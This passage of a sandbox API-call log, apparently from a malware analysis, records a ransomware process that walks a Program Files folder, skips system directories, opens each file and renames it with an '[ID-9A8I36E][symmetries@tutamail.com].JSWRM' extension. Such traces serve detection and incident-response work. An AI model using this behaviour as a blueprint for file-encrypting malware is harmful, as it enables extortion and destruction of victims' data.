lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0069.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0069.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msado15.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msado15.dll", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msado15.dll", lpUsedDefaultChar=0x0) returned 11 [0069.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0069.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0069.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0069.137] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41cc3017, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41cc3017, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41cc3017, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xc600, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="msado20.tlb", cAlternateFileName="")) returned 1 [0069.137] lstrcmpiW (lpString1="msado20.tlb", lpString2=".") returned 1 [0069.137] lstrcmpiW (lpString1="msado20.tlb", lpString2="..") returned 1 [0069.137] lstrcmpiW (lpString1="msado20.tlb", lpString2="...") returned 1 [0069.137] lstrcmpiW (lpString1="msado20.tlb", lpString2="windows") returned -1 [0069.137] lstrcmpiW (lpString1="msado20.tlb", lpString2="recovery") returned -1 [0069.137] lstrcmpiW (lpString1="msado20.tlb", lpString2="perflogs") returned -1 [0069.137] lstrcmpiW (lpString1="msado20.tlb", lpString2="documents and settings") returned 1 [0069.138] lstrcmpiW (lpString1="msado20.tlb", lpString2="$RECYCLE.BIN") returned 1 [0069.138] lstrcmpiW (lpString1="msado20.tlb", lpString2="system volume information") returned -1 [0069.138] lstrcmpiW (lpString1="msado20.tlb", lpString2="msocache") returned -1 [0069.138] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0069.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msado20.tlb", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msado20.tlb", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msado20.tlb", lpUsedDefaultChar=0x0) returned 11 [0069.138] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0069.138] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0069.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msado20.tlb", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msado20.tlb", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msado20.tlb", lpUsedDefaultChar=0x0) returned 11 [0069.138] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0069.138] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209440 [0069.138] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0069.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.138] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.138] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0069.138] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado20.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.148] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9170201855693288) returned 0 [0069.148] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0069.148] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0069.149] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0069.149] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0069.149] CloseHandle (hObject=0xffffffff) returned 1 [0069.149] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0069.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.149] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.149] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0069.149] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.149] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0069.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.149] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0069.149] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0069.149] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0069.149] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0069.149] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f280 [0069.149] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0069.149] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0069.149] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado20.tlb"), lpNewFileName="C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\system\\ado\\msado20.tlb.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0069.149] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f280 | out: hHeap=0x1e0000) returned 1 [0069.149] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0069.149] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0069.149] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41cc3017, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41cc3017, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41cc3017, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd200, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="msado21.tlb", cAlternateFileName="")) returned 1 [0069.149] lstrcmpiW (lpString1="msado21.tlb", lpString2=".") returned 1 [0069.149] lstrcmpiW (lpString1="msado21.tlb", lpString2="..") returned 1 [0069.149] lstrcmpiW (lpString1="msado21.tlb", lpString2="...") returned 1 [0069.149] lstrcmpiW (lpString1="msado21.tlb", lpString2="windows") returned -1 [0069.149] lstrcmpiW (lpString1="msado21.tlb", lpString2="recovery") returned -1 [0069.149] lstrcmpiW (lpString1="msado21.tlb", lpString2="perflogs") returned -1 [0069.150] lstrcmpiW (lpString1="msado21.tlb", lpString2="documents and settings") returned 1 [0069.150] lstrcmpiW (lpString1="msado21.tlb", lpString2="$RECYCLE.BIN") returned 1 [0069.150] lstrcmpiW (lpString1="msado21.tlb", lpString2="system volume information") returned -1 [0069.150] lstrcmpiW (lpString1="msado21.tlb", lpString2="msocache") returned -1 [0069.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0069.150] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msado21.tlb", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.150] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msado21.tlb", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msado21.tlb", lpUsedDefaultChar=0x0) returned 11 [0069.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0069.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0069.150] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msado21.tlb", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.150] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msado21.tlb", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msado21.tlb", lpUsedDefaultChar=0x0) returned 11 [0069.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0069.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0069.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209440 | out: hHeap=0x1e0000) returned 1 [0069.150] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.150] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0069.150] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado21.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.150] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9168140271392888) returned 0 [0069.150] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0069.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0069.150] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0069.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0069.150] CloseHandle (hObject=0xffffffff) returned 1 [0069.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0069.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0069.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0069.151] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0069.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0069.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0069.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0069.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f158 [0069.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0069.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0069.151] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado21.tlb"), lpNewFileName="C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\system\\ado\\msado21.tlb.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0069.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0069.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0069.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0069.151] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41cc3017, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41cc3017, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41cc3017, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="msado25.tlb", cAlternateFileName="")) returned 1 [0069.151] lstrcmpiW (lpString1="msado25.tlb", lpString2=".") returned 1 [0069.151] lstrcmpiW (lpString1="msado25.tlb", lpString2="..") returned 1 [0069.151] lstrcmpiW (lpString1="msado25.tlb", lpString2="...") returned 1 [0069.151] lstrcmpiW (lpString1="msado25.tlb", lpString2="windows") returned -1 [0069.151] lstrcmpiW (lpString1="msado25.tlb", lpString2="recovery") returned -1 [0069.151] lstrcmpiW (lpString1="msado25.tlb", lpString2="perflogs") returned -1 [0069.151] lstrcmpiW (lpString1="msado25.tlb", lpString2="documents and settings") returned 1 [0069.151] lstrcmpiW (lpString1="msado25.tlb", lpString2="$RECYCLE.BIN") returned 1 [0069.151] lstrcmpiW (lpString1="msado25.tlb", lpString2="system volume information") returned -1 [0069.151] lstrcmpiW (lpString1="msado25.tlb", lpString2="msocache") returned -1 [0069.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0069.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msado25.tlb", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msado25.tlb", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msado25.tlb", lpUsedDefaultChar=0x0) returned 11 [0069.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0069.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0069.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msado25.tlb", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msado25.tlb", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msado25.tlb", lpUsedDefaultChar=0x0) returned 11 [0069.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0069.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0069.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0069.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0069.152] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado25.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.152] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9167109479240168) returned 0 [0069.152] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0069.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0069.152] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0069.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0069.152] CloseHandle (hObject=0xffffffff) returned 1 [0069.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0069.152] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.153] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.153] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.153] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0069.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.153] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.153] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0069.153] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0069.153] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0069.153] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0069.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0069.153] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f158 [0069.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0069.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0069.153] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado25.tlb"), lpNewFileName="C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\system\\ado\\msado25.tlb.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0069.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0069.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0069.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0069.153] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41cc3017, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41cc3017, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41cc3017, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x11400, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="msado26.tlb", cAlternateFileName="")) returned 1 [0069.153] lstrcmpiW (lpString1="msado26.tlb", lpString2=".") returned 1 [0069.153] lstrcmpiW (lpString1="msado26.tlb", lpString2="..") returned 1 [0069.153] lstrcmpiW (lpString1="msado26.tlb", lpString2="...") returned 1 [0069.153] lstrcmpiW (lpString1="msado26.tlb", lpString2="windows") returned -1 [0069.153] lstrcmpiW (lpString1="msado26.tlb", lpString2="recovery") returned -1 [0069.153] lstrcmpiW (lpString1="msado26.tlb", lpString2="perflogs") returned -1 [0069.153] lstrcmpiW (lpString1="msado26.tlb", lpString2="documents and settings") returned 1 [0069.153] lstrcmpiW (lpString1="msado26.tlb", lpString2="$RECYCLE.BIN") returned 1 [0069.153] lstrcmpiW (lpString1="msado26.tlb", lpString2="system volume information") returned -1 [0069.153] lstrcmpiW (lpString1="msado26.tlb", lpString2="msocache") returned -1 [0069.153] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0069.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msado26.tlb", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msado26.tlb", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msado26.tlb", lpUsedDefaultChar=0x0) returned 11 [0069.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0069.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0069.154] WideCharToMultiByte (in: 